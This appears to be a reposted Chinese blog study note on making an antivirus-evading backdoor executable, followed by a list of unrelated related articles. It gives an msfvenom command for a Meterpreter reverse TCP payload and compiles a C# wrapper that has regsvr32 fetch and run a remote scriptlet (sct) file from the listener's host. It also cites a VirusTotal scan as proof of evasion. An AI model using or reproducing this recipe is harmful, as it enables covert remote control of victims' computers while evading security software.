exe文件,后门免杀的制作学习笔记
2018-02-28 09:50
274 查看
引用原文!!
注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。
需要(Framework),一般Windows环境都有,C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5555 X > shell.exekali下生成后门文件。直接查杀,发现很多报毒。
原文要求生成一个sct文件,然后放到你的web服务的目录中,实现监听。
制作后门文件:
1、cmd必须给与管理员权限
2、cmd下,
cd C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727>csc /t:exe /out:aaa.exe regsvr32.cs/t:exe意思是,输出exe文件。
/out:aaa.exe意思是,输出名字叫aaa的exe文件。
regsvr32.cs就是我们利用做免杀的c#文件。
https://github.com/pasahitz/regsvr32
regsvr32.cs这个文件需要单独编辑
using System; using System.Runtime.InteropServices; namespace Regsvr { public class CMD { [DllImport("msvcrt.dll")] public static extern int system(string cmd); public static void Main() { system("regsvr32 /s /n /u /i:http://监听者IP:监听的端口/你刚才生成的sct文件 scrobj.dll"); }}}免杀后杀毒报告:https://www.virustotal.com/zh-cn/file/4f5801be2516cc8cfe4a73d00d44ca399c5bc116e9ac0d7f9f7a9aa29dca6f65/analysis/1495456458/
Malwarebytes这个杀毒软件好强悍。
相关文章推荐
- 移植内核学习笔记2-----修改分区及制作根文件系统
- iText制作PDF文件 学习笔记 (二)
- 工作学习笔记——VS2010无法复制exe文件导致的工程生成失败问题
- iText制作PDF文件 学习笔记 (五)
- iText制作PDF文件 学习笔记 (三)
- linux嵌入式根文件系统制作学习笔记
- 如何用python制作一个锻炼计算能力的exe小程序-学习笔记11-pyinstaller
- 嵌入式学习笔记(3)---YAFFS文件系统的制作移植
- iText制作PDF文件 学习笔记 (七)
- ARToolkit学习笔记-exe文件一闪而过l的问题
- python学习笔记--将python源文件打包成exe文件(pyinstaller)
- iText制作PDF文件 学习笔记 (六)
- JDK1.8版本的dubbo-admin的war文件制作 (学习笔记)
- C语言学习笔记之 第五讲:C语言弹窗打开一个exe,文件,网站案例
- iText制作PDF文件 学习笔记 (四)
- iText制作PDF文件 学习笔记 (一)
- Qt学习笔记:如何运行Qt程序所生成的.exe文件
- [转]文件过滤系统驱动开发Filemon学习笔记与filemon.exe
- [python学习笔记] python程序打包成exe文件
- caffe学习笔记-数据库制作及计算均值文件命令格式(windows版)